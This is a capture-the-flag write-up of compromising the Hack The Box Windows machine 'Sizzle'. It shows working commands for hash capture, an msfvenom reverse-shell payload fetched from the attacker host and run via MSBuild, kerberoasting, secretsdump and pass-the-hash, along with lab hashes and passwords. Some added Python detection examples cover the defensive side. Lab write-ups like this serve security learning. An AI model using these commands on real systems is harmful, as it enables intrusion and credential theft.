htb-sizzle

Sizzle was a great machine; everything about it was great. It was very realistic, fun and of course challenging. Personally it is one of my favorites and one of the best Active Directory boxes I have ever solved. It starts with getting write access to a folder in an SMB share; a simple SCF file attack with responder and john can give me a password for a user. With that password, I was able to generate a certificate request, get a certificate and then a WinRM session. After that comes the most challenging part of the box: bypassing antivirus, kerberoasting, and privilege escalation. But before we do that, we'll take a look at an unintended path first. That was the box in short. It's a Windows box and the IP is 10.10.10.103; I added it to /etc/hosts as sizzle.htb.


Nmap

As always, first an nmap scan

root@kali:~/htb/sizzle# nmap -sV -sT -sC sizzle.htb
Starting Nmap 7.80 (https://nmap.org) at 2020-01-02 06:30 EST
Nmap scan report for sizzle.htb (10.10.10.103)
Host is up (0.12s latency).
Not shown: 990 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11:22:14
|_Not valid after:  2021-01-01T11:22:14
|_ssl-date: 2020-01-02T11:35:10+00:00; +1m11s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11:22:14
|_Not valid after:  2021-01-01T11:22:14
|_ssl-date: 2020-01-02T11:35:09+00:00; +1m11s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-01-02T11:22:14
|_Not valid after:  2021-01-01T11:22:14
|_ssl-date: 2020-01-02T11:35:09+00:00; +1m11s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/2%Time=5E0DD478%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m10s, deviation: 0s, median: 1m10s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-01-02T11:34:31
|_  start_date: 2020-01-02T11:31:19

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.22 seconds
root@kali:~/htb/sizzle#

 

We have many ports: ftp on port 21, dns on port 53, http on port 80, smb and ldap. We also see that the domain is HTB.LOCAL and the commonName is sizzle.htb.local, so I added it to /etc/hosts:


HTTP

I checked the http server and the index only had this gif:

Then I ran gobuster and DirB:

root@kali:~/htb/sizzle# gobuster dir -u http://10.10.10.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.103
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/02 06:33:35 Starting gobuster
===============================================================
/images (Status: 301)
/Images (Status: 301)
/IMAGES (Status: 301)

root@kali:~/htb/sizzle# dirb http://10.10.10.103

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 2 07:48:37 2020
URL_BASE: http://10.10.10.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.103/ ----
==> DIRECTORY: http://10.10.10.103/aspnet_client/                                                    
==> DIRECTORY: http://10.10.10.103/certenroll/                                                       
+ http://10.10.10.103/certsrv (CODE: 401 | SIZE: 1293)

/certenroll seems interesting, but is unfortunately prohibited:

Time to check smb.


SMB, SCF File Attack, Amanda’s Credentials

The first thing we need to know is which shares exist; we can use smbclient to list them:
smbclient --list //sizzle.htb/ -U ""

I noticed that there was a share for Active Directory Certificate Services. Most likely /certsrv is on the web server:
http://sizzle.htb/certsrv

root@kali:~/htb# smbclient //sizzle.htb/"Department Shares" -U ""
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\'s password: 
Try "help" to get a list of possible commands.
smb: \>

There were many directories, but 2 that allowed writing: ZZ_ARCHIVE and Users/Public.

We are looking for references. Since we can write to any of the folders, we may be able to apply an SCF file attack. You can read about it here. We are going to put an scf file in Users/Public. It looks like this:

Then we will run responder. When a user browses through that folder, their machine automatically tries to connect to my box via SMB; that's when responder catches the hashes. More info in the link above.
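
From the defending side, the same behaviour can be hunted for: shell files in writable shares whose icon or target is a UNC path to a host outside the organisation. The following is an added example, not code from the original write-up; it also covers .url files, which goes beyond the .scf case described here. The function names, the trusted host and network lists and the sample share contents are assumptions constructed for illustration.

```python
import ipaddress
import re
from pathlib import PureWindowsPath

# Text-based shell files that Explorer reads when it renders a folder.
# .scf is the type used on this page; .url is handled the same way here.
SHELL_FILE_TYPES = {".scf", ".url"}

# Matches "Key=\\host\..." lines, i.e. a value that is a UNC path.
UNC_VALUE = re.compile(
    r"^[ \t]*(?P<key>[A-Za-z]+)[ \t]*=[ \t]*\\\\(?P<host>[^\\/\s]+)[\\/]",
    re.MULTILINE,
)


def is_trusted(host, trusted_hosts, trusted_nets):
    # Trusted means: a known file-server name, or an IP address inside one
    # of the organisation's own networks.
    if host.lower() in trusted_hosts:
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(address in net for net in trusted_nets)


def scan_share(files, trusted_hosts=(), trusted_nets=()):
    # files maps a share-relative path to the file's text content.
    hosts = {h.lower() for h in trusted_hosts}
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for path, text in files.items():
        if PureWindowsPath(path).suffix.lower() not in SHELL_FILE_TYPES:
            continue
        for match in UNC_VALUE.finditer(text):
            host = match.group("host")
            if not is_trusted(host, hosts, nets):
                findings.append((path, match.group("key"), host))
    return findings


# Constructed sample share contents (file names and bodies are made up).
SAMPLE_SHARE = {
    r"Users\Public\notes.scf": r"""[Shell]
Command=2
IconFile=\\10.10.16.70\share\icon.ico
[Taskbar]
Command=ToggleDesktop
""",
    r"Users\Public\Show Desktop.scf": r"""[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
""",
    r"ZZ_ARCHIVE\intranet.url": r"""[InternetShortcut]
URL=http://sizzle.htb.local/
IconFile=\\sizzle.htb.local\NETLOGON\site.ico
""",
}

if __name__ == "__main__":
    for finding in scan_share(SAMPLE_SHARE, ["sizzle.htb.local"], ["10.10.10.0/24"]):
        print("remote reference:", finding)
```

Blocking outbound SMB (TCP 445) at the perimeter and removing anonymous write access from the share address the same problem at its source.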

 

root@kali:/tmp# responder -I tun0

NBT-NS, LLMNR & MDNS Responder 2.3.4.0


-cut-

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.70]
Challenge set [random]
Don't Respond To Names ['ISATAP']

[+] Listening for events ...
[SMB] NTLMv2-SSP Client   : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:a6d23653a4821fc8:03851040934EDC44A5A58C61B9C048AE:
[*] Skipping previously captured hash for HTB\amanda

Responder captured a hash for a user named amanda. Let's crack it with john:

The password is Ashare1972


Requesting a Certificate, WinRm Session as amanda

I tried to access certenroll as amanda and it worked fine

root@kali:~/htb/sizzle# smbclient //sizzle.htb/"CertEnroll" -U amanda
Enter WORKGROUP\amanda's password: Ashare1972
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun 30 13:47:19 2020
  ..                                  D        0  Tue Jun 30 13:47:19 2020
  HTB-SIZZLE-CA+.crl                  A      721  Tue Jun 30 13:47:19 2020
  HTB-SIZZLE-CA.crl                   A      909  Tue Jun 30 13:47:19 2020
  nsrev_HTB-SIZZLE-CA.asp             A      322  Mon Jul  2 16:36:05 2018
  sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt  A      871  Mon Jul  2 16:36:03 2018

So I went to /certsrv and used amanda's credentials to authenticate.

Now it is time to get a certificate. But wait, what is the certificate for?
A full nmap scan shows that the WinRM ports are open:
nmap -p- -T5 -vvv --max-retries 1 sizzle.htb

nmap -p 5985,5986 -sV -sT -sC sizzle.htb

Port 5985 uses HTTP while 5986 uses HTTPS. When I got amanda's credentials I tried to connect to port 5985 and it didn't work, so we do it through port 5986, which is why we need a certificate. (If you don't know how to connect via WinRM, we'll get to that later.)
We’ll generate a certificate request and a private key:
openssl req -newkey rsa:2048 -nodes -keyout request.key -out request.csr

Then we will make an advanced certificate request, paste our request and download the certificate (base64 encoded)

Now we can use WinRM, but what is WinRM?

WinRM is not intended to be used from Linux, but luckily there is a Ruby library. That's how we connect.

I used Alamot's shell and added some lines for the certificate and key:

root@kali:~/htb/sizzle# cat htb-sizzle-winrm.rb
#!/usr/bin/ruby
require 'winrm'

# Author: Alamot

# Connect to the HTTPS WinRM listener and authenticate with the client
# certificate issued by /certsrv and the private key generated above.
conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: '/root/htb/sizzle/certnew.cer',
  client_key: '/root/htb/sizzle/request.key',
  # The server certificate is not validated (lab setting).
  :no_ssl_peer_verification => true
)

command = ""

conn.shell(:powershell) do |shell|
  until command == "exit\n" do
    # Build a prompt from the remote user, computer name and current directory.
    output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
    print(output.output.chomp)
    command = gets
    # Run the typed command and stream its output back to the terminal.
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}"
end

And it worked:

But there was no user.txt:


Stored NTLM Hashes, Secretsdump, Privilege Escalation

While enumerating the file system I found a file, file.txt, in C:\Windows\System32. That file had NTLM hashes for all users!

root@kali:~/htb/sizzle# ruby htb-sizzle-winrm.rb
PS htb\amanda@SIZZLE Documents> type C:\Windows\System32\file.txt
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c718f548c75062ada93250db208d3178:::

Domain    User  ID  Hash
------    ----  --  ----
HTB.LOCAL Guest 501 -
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrb3n:1105:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
PS htb\amanda@SIZZLE Documents>

I honestly don’t know why. After resetting the machine, the file was still there. I don’t know if the creator made an accidental mistake, but at least let’s see how we can use that.
That admin hash was useless, I tried with SMB, I cracked it, tried Psexec. It did not work. I cracked mrlky’s hash:

The password was Football#7. I used it with secretsdump.py from impacket and got another hash for the administrator:

root@kali:~/htb# secretsdump.py -just-dc mrlky@sizzle.htb.local 
Impacket v0.9.22.dev1+20200629.145357.5d4ad6cc - Copyright 2020 SecureAuth Corporation

Password:Football#7
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:90fff1f794a2c3b1b2cd892a1f48c7fb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
Administrator:des-cbc-md5:ad7afb706715e964
krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
krbtgt:des-cbc-md5:866db35eb9ec5173
amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
amanda:des-cbc-md5:70ba677a4c1a2adf
mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
mrlky:des-cbc-md5:02f1a4da0432f7f7
sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
sizzler:des-cbc-md5:5d51d30e68d092d9
SIZZLE$:aes256-cts-hmac-sha1-96:030d88489850a42ac3e92454f7a66f61189450943a2d9836d7b376e5236e12c5
SIZZLE$:aes128-cts-hmac-sha1-96:9032103c089fb008ad9cde29b3a6132f
SIZZLE$:des-cbc-md5:f81a64e0a1a20eb5
[*] Cleaning up...

It wasn't cracking. I tried the psexec metasploit module and for some reason it didn't work, so I used the hash with SMB to access C$, then downloaded the flags.

root@kali:~/htb/sizzle# smbclient //sizzle.htb/C$ -U "Administrator" --pw-nt-hash f6b7160bfc91823792e0ac3a162c9267
Try "help" to get a list of possible commands.
smb: \> cd users
smb: \users\> cd administrator
smb: \users\administrator\> cd desktop
smb: \users\administrator\desktop\> ls
  .                                  DR        0  Tue Jul 10 18:24:52 2018
  ..                                 DR        0  Tue Jul 10 18:24:52 2018
  desktop.ini                       AHS      282  Mon Jul  2 23:00:22 2018
  root.txt                            A       32  Tue Jul 10 18:24:58 2018
smb: \users\administrator\desktop\>

Now forget that we saw that. Let's try something more realistic.


Backtrack

Back to the WinRM session as amanda, let's examine our environment.
There was AppLocker:

Antivirus:

We were even in Constrained Language Mode in PowerShell:

Since this was an Active Directory environment I wanted to do kerberoasting, but Invoke-Kerberoast.ps1 needed Full Language Mode, and I couldn't use GetUserSPNs.py because the services were internal only. And my attempts to evade the antivirus failed. I could bypass the constrained language mode with PSByPassCLM and still couldn't use Invoke-Kerberoast.ps1. AppLocker is easy to bypass so it wasn't an issue. But I had to bypass the antivirus.


Bypassing AV

CLM / AppLocker Break Out

Enumeration

The shell I have is quite limited. I can see that I’m in constrained language mode, and that AppLocker is limiting what I can run.

PS htb\amanda@SIZZLE v2.0.50727> $executioncontext.sessionstate.languagemode
ConstrainedLanguage   
PS htb\amanda@SIZZLE Documents> Get-AppLockerPolicy -Effective -XML

I found this article and this POC.
The first time, I created the payload like this:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -f csharp

And I added the shellcode to the POC and applied the exploit:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\system32\spool\drivers\color\shellcode.xml

The antivirus detected it. I added an encoder and 100 iterations and tried again:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.xx.xx LPORT=1339 -e x86/shikata_ga_nai -i 100 -f csharp

Then I added the shellcode to shellcode.xml.
shellcode.xml: https://github.com/puckiestyle/pentest/blob/master/shellcode.xml

root@kali:~/htb/sizzle# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.103 - - [02/Jan/2020 09:45:17] "GET /shellcode.xml HTTP/1.1" 200 -
PS htb\amanda@SIZZLE color> Invoke-WebRequest -o shellcode.xml http://10.10.16.70/shellcode.xml
PS htb\amanda@SIZZLE color> c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\system32\spool\drivers\color\shellcode.xml
Microsoft (R) Build Engine version 4.6.1586.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 1/2/2020 9:52:59 AM.

This time it worked, and I got a meterpreter session!

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.70:1339
[*] Sending stage (179779 bytes) to 10.10.10.103
[*] Meterpreter session 1 opened (10.10.16.70:1339 -> 10.10.10.103:57175) at 2020-01-02 09:51:50 -0500

meterpreter > sysinfo
Computer        : SIZZLE
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Meterpreter     : x86/windows
meterpreter >
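
What this step leaves behind for a defender is a process-creation record: MSBuild.exe started from a remote management session, building an .xml file out of a user-writable directory under C:\Windows. The following added example (not part of the original write-up) reviews such records; the events are constructed using Sysmon event 1 field names, and the directory, parent and extension lists as well as the wsmprovhost.exe parent are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Assumption: directories a standard user can write to that path-based allow
# rules often still cover. The first entry is the one used on this page.
USER_WRITABLE = (
    r"c:\windows\system32\spool\drivers\color",
    r"c:\windows\tasks",
    r"c:\windows\temp",
    r"c:\users",
)
# Assumptions: parents that normally start a build, and normal project types.
EXPECTED_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
PROJECT_EXTENSIONS = {".sln", ".proj", ".csproj", ".vbproj", ".vcxproj"}

TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def arguments(command_line):
    # Split a Windows command line into tokens, honouring double quotes.
    return [quoted or bare for quoted, bare in TOKEN.findall(command_line)]


def review_msbuild(event):
    # Returns the reasons an MSBuild launch looks out of place (empty = fine).
    if PureWindowsPath(event["Image"]).name.lower() != "msbuild.exe":
        return []
    reasons = []
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append("unexpected parent: " + parent)
    # The project file is the first argument that is not a /switch or -switch.
    files = [a for a in arguments(event["CommandLine"])[1:]
             if not a.startswith(("/", "-"))]
    if files:
        project = PureWindowsPath(files[0].lower())
        if project.suffix not in PROJECT_EXTENSIONS:
            reasons.append("unusual project extension: " + project.suffix)
        if any(str(project).startswith(d + "\\") for d in USER_WRITABLE):
            reasons.append("project in user-writable directory: " + str(project.parent))
    return reasons


MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
# Constructed process-creation records; the first mirrors the command above,
# with the WinRM host process assumed as parent.
SAMPLE_PROCESS_EVENTS = [
    {"Image": MSBUILD,
     "CommandLine": MSBUILD + r" c:\windows\system32\spool\drivers\color\shellcode.xml",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": MSBUILD,
     "CommandLine": '"' + MSBUILD + '"' + r" /nologo C:\src\app\app.csproj /t:Build",
     "ParentImage": r"C:\Program Files\IDE\devenv.exe"},
]

if __name__ == "__main__":
    for record in SAMPLE_PROCESS_EVENTS:
        print(record["CommandLine"], "->", review_msbuild(record))
```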

 


Kerberoasting, Privilege Escalation

Now that we have a meterpreter session, we can route the internal subnet, use a proxy, then use GetUserSPNs.py and see if any user is kerberoastable.
First thing is to configure proxychains to use port 8080:
/etc/proxychains.conf

Then we will use auxiliary/server/socks4a to add the route and set up the proxy:

route add 10.10.10.0 255.255.255.0 1
This adds a route for the whole internal subnet, where 1 is the session number.
Now we are ready. Let's kerberoast!

root@kali:~/htb/sizzle# proxychains GetUserSPNs.py -request -dc-ip 10.10.10.103 HTB.LOCAL/amanda:Ashare1972
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:389-<><>-OK
ServicePrincipalName  Name   MemberOf                                               PasswordLastSet             LastLogon
--------------------  -----  -----------------------------------------------------  --------------------------  --------------------------
http/sizzle           mrlky  CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL  2018-07-10 14:08:09.536421  2018-07-12 10:23:50.871575

|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-10.10.10.103:88-<><>-OK
$krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle*$74c34fa35f660924e4aee5fe2a825cbb$2912898f4e75794e6750066f47fb2ebcf0b320282ca6b9ff00b0572b39f45795a6d8367d2bbd073e18e8a669117d4e6dd2af17201e7466adadcecef7dccc52b31d553b9064aabf7de0e2200f2b4edcb214e198c1082cb65879dad99e4be078c9621a2f75a34e5175bad3a22b5c8f453caa957e35ef3698d758c4e5648b9b7a2046aed03bf772beb11e48c223c432263fda8aeacacc5a06cdb40d77ade4b5f3346ce37fdad2d346b79be4adc0ff7c7c59413c5083cfddcec1263685af7eb088d7a51803f5761a4e4b232f84bd24df54ec4bad85b57b12d865f0969b0871d038dc5f8acac9acd1592c41b39c4c027f991c96d0d869f00cfab092311baff1d9ba880c858c678e486453775223746a01a6c893f74a3ff13e972a909b72b842561505b6ec74dedb2a5046184d3b3a6445a2f65c3715db38379d50f542c77fd297b26fd22f30f3198006774044afa48336ec8f4c539f296128b861e4e67767921b7c2ab149ae5d415098086e4e23ff305b684f078bc7a89fca3ebefd5a7f3d189cd6ae10176dc9b8fef8e6a93a6d820ad11948247d130647d3453df0755ccc1450c188ed3894b270fd052934674626d8685df1f12e32cbf2cf60a1c9940a68bb0e89e70ffb2211f6d758be7442ba13d6646b4afecdede2fb2449b96101709e16757c2c7e1366e4aea3
root@kali:~/htb/sizzle#

User mrlky was kerberoastable and we have a hash; let's give this to john:

root@kali:~/htb/sizzle# john --wordlist=/usr/share/wordlists/rockyou.txt mrlky.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7       (?)
1g 0:00:00:20 DONE (2020-01-02 10:16) 0.04780g/s 533806p/s 533806c/s 533806C/s Forever29Life05..Fokatrepa
Use the "--show" option to display all of the cracked passwords reliably
Session completed
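
On the domain controller, the ticket request above is recorded as Security event 4769 with encryption type 0x17 (RC4, the "23" in the hash that john loaded). The following added example, which is not part of the original write-up, filters constructed 4769 records for RC4 tickets issued for user accounts and groups them by requester; the helper names, the sample events and the burst threshold are assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # Kerberos etype 23, the type in the "$krb5tgs$23$" hash above


def is_user_service(service_name):
    # Computer accounts end in "$" and krbtgt is the ticket-granting service;
    # neither has a human-chosen password, so only other accounts matter here.
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def rc4_service_tickets(events):
    # Successful 4769 events where an RC4 ticket was issued for a user account.
    hits = []
    for event in events:
        if event["EventID"] != 4769 or event["Status"] != "0x0":
            continue
        if int(event["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if is_user_service(event["ServiceName"]):
            hits.append(event)
    return hits


def requesters(events, burst=3):
    # Group hits by (requesting account, source address); many distinct
    # services from one requester means every SPN in the domain was requested.
    services = defaultdict(set)
    for event in rc4_service_tickets(events):
        key = (event["TargetUserName"], event["IpAddress"])
        services[key].add(event["ServiceName"])
    return {
        key: {"services": sorted(names), "burst": len(names) >= burst}
        for key, names in services.items()
    }


def ticket(user, service, etype, ip="::ffff:10.10.10.50", status="0x0"):
    # Builds one constructed 4769 record with only the fields used here.
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


# Constructed sample events; account names follow the page, the rest is made up.
SAMPLE_TICKET_EVENTS = [
    ticket("amanda@HTB.LOCAL", "SIZZLE$", "0x12"),            # AES256, computer account
    ticket("amanda@HTB.LOCAL", "krbtgt", "0x12"),             # ticket-granting service
    ticket("amanda@HTB.LOCAL", "mrlky", "0x17",
           ip="::ffff:10.10.10.103"),                         # RC4 for a user account
    ticket("sizzler@HTB.LOCAL", "mrlky", "0x12"),             # AES256 for the same account
    ticket("amanda@HTB.LOCAL", "mrb3n", "0xffffffff",
           status="0x7"),                                     # failed request
]

if __name__ == "__main__":
    for who, detail in requesters(SAMPLE_TICKET_EVENTS).items():
        print(who, detail)
```

A long random password on the service account, or restricting the account to AES encryption types, removes the value of the ticket to an offline cracker.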

The password is Football#7; now we can reuse secretsdump.py and do the same as before:

root@kali:~/htb/sizzle# secretsdump.py sizzle.htb.local/mrlky:Football#7@sizzle.htb.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up...

That is it!

Consulted literature: https://0xrick.github.io/hack-the-box/sizzle/

Author – Puckiestyle
